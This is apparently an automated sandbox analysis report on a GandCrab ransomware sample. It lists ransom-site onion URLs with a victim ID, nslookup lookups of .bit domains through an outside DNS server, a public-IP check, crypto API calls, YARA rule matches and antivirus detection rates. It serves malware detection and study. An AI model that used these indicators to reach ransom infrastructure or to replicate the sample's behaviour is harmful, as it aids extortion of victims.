Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: 9gkAKTWOXp.exe	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: 9gkAKTWOXp.exe	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: 9gkAKTWOXp.exe	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: 9gkAKTWOXp.exe	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: 9gkAKTWOXp.exe	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: 9gkAKTWOXp.exe	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: vkspii.exe.1.dr	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: vkspii.exe.1.dr	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: vkspii.exe.1.dr	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: vkspii.exe.1.dr	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: vkspii.exe.1.dr	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: vkspii.exe.1.dr	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de

Uses nslookup.exe to query domains

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior

May check the online IP address of the machine

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	DNS query: name: ipv4bot.whatismyipaddress.com

Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
Source: 9gkAKTWOXp.exe, vkspii.exe.1.dr	String found in binary or memory: https://www.torproject.org/

Source: unknown

DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00407A00 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,

1_2_00407A00

Spam, unwanted Advertisements and Ransom Demands

Yara detected Gandcrab

Source: Yara match	File source: 9gkAKTWOXp.exe, type: SAMPLE
Source: Yara match	File source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9gkAKTWOXp.exe PID: 4664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkspii.exe PID: 6028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkspii.exe PID: 4024, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPED

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	1_2_00406000
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	13_2_00406000
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	21_2_00406000

Source: nslookup.exe

Process created: 43

System Summary

Malicious sample detected (through community Yara rule)

Source: 9gkAKTWOXp.exe, type: SAMPLE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPED	Matched rule: Gandcrab Payload Author: kevoreilly

Source: 9gkAKTWOXp.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9gkAKTWOXp.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 9gkAKTWOXp.exe, type: SAMPLE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPED	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00402000	1_2_00402000
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00407EE0	1_2_00407EE0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00402000	13_2_00402000
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00407EE0	13_2_00407EE0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00402000	21_2_00402000
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00407EE0	21_2_00407EE0

Source: 9gkAKTWOXp.exe	Virustotal: Detection: 81%
Source: 9gkAKTWOXp.exe	Metadefender: Detection: 72%
Source: 9gkAKTWOXp.exe	ReversingLabs: Detection: 100%

Source: 9gkAKTWOXp.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9gkAKTWOXp.exe "C:\Users\user\Desktop\9gkAKTWOXp.exe"
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
